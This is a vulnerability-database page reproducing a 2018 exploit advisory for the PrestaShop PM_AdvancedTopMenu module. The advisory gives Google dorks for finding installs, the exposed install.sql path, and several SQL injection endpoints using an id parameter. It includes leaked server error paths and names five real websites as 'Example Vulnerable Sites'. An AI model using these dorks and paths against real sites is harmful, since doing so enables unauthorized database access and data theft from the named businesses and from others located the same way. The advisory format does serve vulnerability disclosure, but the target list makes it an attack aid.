Vulners
Lucene search
PrestaShop PM_AdvancedTopMenu 1.4.6.2 Database Disclosure / SQL Injection
🗓️ 24 Dec 2018 00:00:00Reported by KingSkrupellosType 
packetstorm🔗 packetstormsecurity.com👁 58 Views
`#################################################################################################
# Exploit Title : PrestaShop PM_AdvancedTopMenu 1.4.6.2 Database Disclosure
and SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link :
presta-module.com/en/3-prestashop-addons/7-appearance/6-advanced-top-menu.html
+ prestashop.com/forums/topic/89175-module-pm-advancedtopmenu/
+ addons.prestashop.com/en/menu/2072-advanced-top-menu-responsive.html
# Software Price : 50$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.10.0 - 1.4.7.0 - 1.4.6.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_advancedtopmenu/''
intext:''Hexagone High-Tech se fournit chez''
intext:''crA(c)ation: webncie // A(c) Eight-Racing.com 2013-2014 tous droits
rA(c)servA(c)s''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-89 - [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
#################################################################################################
# Database Disclosure Exploit :
/modules/pm_advancedtopmenu/install.sql
# SQL Injection Exploit :
/modules/pm_advancedtopmenu/pm_advancedtopmenu.php?id=[SQL Injection]
/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php?id=[SQL Injection]
/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php?id=[SQL
Injection]
/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php?id=[SQL
Injection]
#################################################################################################
# Example SQL Database Error =>
Warning:
include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php):
failed to open stream: No such file or directory in
/home/hexago7/public_html/hexagone.mg/modules/
pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
Warning: include_once(): Failed opening
'_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php'
for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/hexago7/public_html/hexagone.mg/modules
/pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
Warning:
include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php):
failed to open stream: No such file or directory in
/home/hexago7/public_html/hexagone.mg/modules
/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
Warning: include_once(): Failed opening
'_PS_ROOT_DIR_/modules/pm_advancedtopmenu
/AdvancedTopMenuColumnWrapClass.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php')
in /home/hexago7/public_html/
hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
Warning:
include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php):
failed to open stream: No such file or directory in
/home/hexago7/public_html/hexagone.mg/modules
/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
Warning: include_once(): Failed opening
'_PS_ROOT_DIR_/modules/pm_advancedtopmenu
/AdvancedTopMenuColumnClass.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/hexago7/public_html/
hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
Warning:
include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php):
failed to open stream: No such file or directory in
/home/hexago7/public_html/hexagone.mg/
modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
Warning: include_once(): Failed opening
'_PS_ROOT_DIR_/modules/pm_advancedtopmenu/
AdvancedTopMenuElementsClass.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/hexago7/public_html/
hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
Fatal error: Class 'Module' not found in /home/hexago7/public_html/
hexagone.mg/modules
/pm_advancedtopmenu/pm_advancedtopmenu.php on line 23
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/
hexagone.mg
/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php on line 13
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/
hexagone.mg/modules
/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php on line 13
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/
hexagone.mg/modules
/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php on line 13
#################################################################################################
# Example Vulnerable Sites =>
[+] hexagone.mg/modules/pm_advancedtopmenu/install.sql
[+] griffin.ch/modules/pm_advancedtopmenu/install.sql
[+] eight-racing.com/modules/pm_advancedtopmenu/install.sql
[+] domaine-vial.fr/modules/pm_advancedtopmenu/install.sql
[+] tecnicamurciana.es/modules/pm_advancedtopmenu/install.sql
#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team
#################################################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Dec 2018 00:00Current
0.1Low risk
Vulners AI Score0.1